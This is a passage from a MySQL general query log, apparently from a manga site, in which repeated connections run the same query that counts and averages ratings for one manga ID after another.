ratings where manga_id = '89' order by created desc 330647464 Quit 330647465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330647465 Quit 330647466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330647466 Quit 330647467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330647467 Quit 330647468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330647468 Quit 330647469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330647469 Quit 330647470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330647470 Quit 330647471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330647471 Quit 330647472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330647472 Quit 330647473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330647473 Quit 330647474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330647474 Quit 330647475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330647475 Quit 330647476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330647476 Quit 330647477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330647477 Quit 330647478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330647478 Quit 330647479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330647479 Quit 330647480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330647480 Quit 330647481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330647481 Quit 330647482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330647482 Quit 330647483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330647483 Quit 330647484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330647484 Quit 330647485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330647485 Quit 330647486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330647486 Quit 330647487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330647487 Quit 330647488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330647488 Quit 330647489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330647489 Quit 330647490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330647490 Quit 330647491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330647491 Quit 330647492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330647492 Quit 330647493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330647493 Quit 330647494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330647494 Quit 330647495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330647495 Quit 330647496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330647496 Quit 330647497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330647497 Quit 330647498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330647498 Quit 330647499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330647499 Quit 330647500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330647500 Quit 330647501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330647501 Quit 330647502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330647502 Quit 330647503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330647503 Quit 330647504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330647504 Quit 330647505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330647505 Quit 330647506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330647506 Quit 330647507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330647507 Quit 330647508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330647508 Quit 330647509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330647509 Quit 330647510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330647510 Quit 330647511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330647511 Quit 330647512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330647512 Quit 330647513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330647513 Quit 330647514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330647514 Quit 330647515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330647515 Quit 330647516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330647516 Quit 330647517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330647517 Quit 330647518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330647518 Quit 330647519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330647519 Quit 330647520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330647520 Quit 330647521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330647521 Quit 330647522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330647522 Quit 330647523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330647523 Quit 330647524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330647524 Quit 330647525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330647525 Quit 330647526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330647526 Quit 330647527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330647527 Quit 330647528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330647528 Quit 330647529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330647529 Quit 330647530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330647530 Quit 330647531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330647531 Quit 330647532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330647532 Quit 330647533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330647533 Quit 330647534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330647534 Quit 330647535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330647535 Quit 330647536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330647536 Quit 330647537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330647537 Quit 330647538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330647538 Quit 330647539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330647539 Quit 330647540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330647540 Quit 330647541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330647541 Quit 330647542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330647542 Quit 330647543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330647543 Quit 330647544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330647544 Quit 330647545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330647545 Quit 330647546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330647546 Quit 330647547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330647547 Quit 330647548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330647548 Quit 330647549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330647549 Quit 330647550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330647550 Quit 330647551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330647551 Quit 330647552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330647552 Quit 330647553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330647553 Quit 330647554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330647554 Quit 330647555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330647555 Quit 330647556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330647556 Quit 330647557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330647557 Quit 330647558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330647558 Quit 330647559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330647559 Quit 330647560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330647560 Quit 330647561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330647561 Quit 330647562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330647562 Quit 330647563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330647563 Quit 330647564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330647564 Quit 330647565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330647565 Quit 330647566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330647566 Quit 330647567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330647567 Quit 330647568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330647568 Quit 330647569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330647569 Quit 330647570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330647570 Quit 330647571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330647571 Quit 330647572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330647572 Quit 330647573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330647573 Quit 330647574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330647574 Quit 330647575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330647575 Quit 330647576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330647576 Quit 330647577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330647577 Quit 330647578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330647578 Quit 330647579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330647579 Quit 330647580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330647580 Quit 330647581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330647581 Quit 330647582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330647582 Quit 330647583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330647583 Quit 330647584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330647584 Quit 330647585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330647585 Quit 330647586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330647586 Quit 330647587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330647587 Quit 330647588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330647588 Quit 330647589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330647589 Quit 330647590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330647590 Quit 330647591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330647591 Quit 330647592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330647592 Quit 330647593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330647593 Quit 330647594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330647594 Quit 330647595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330647595 Quit 330647596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330647596 Quit 330647597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330647597 Quit 330647598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330647598 Quit 330647599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330647599 Quit 330647600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330647600 Quit 330647601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330647601 Quit 330647602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330647602 Quit 330647603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330647603 Quit 330647604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330647605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330647605 Quit 330647606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647604 Quit 330647606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330647606 Quit 330647607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330647607 Quit 330647608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330647608 Quit 330647609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330647609 Quit 330647610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330647610 Quit 330647611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330647611 Quit 330647612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330647612 Quit 330647613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330647613 Quit 330647614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330647614 Quit 330647615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330647615 Quit 330647616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330647616 Quit 330647617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where 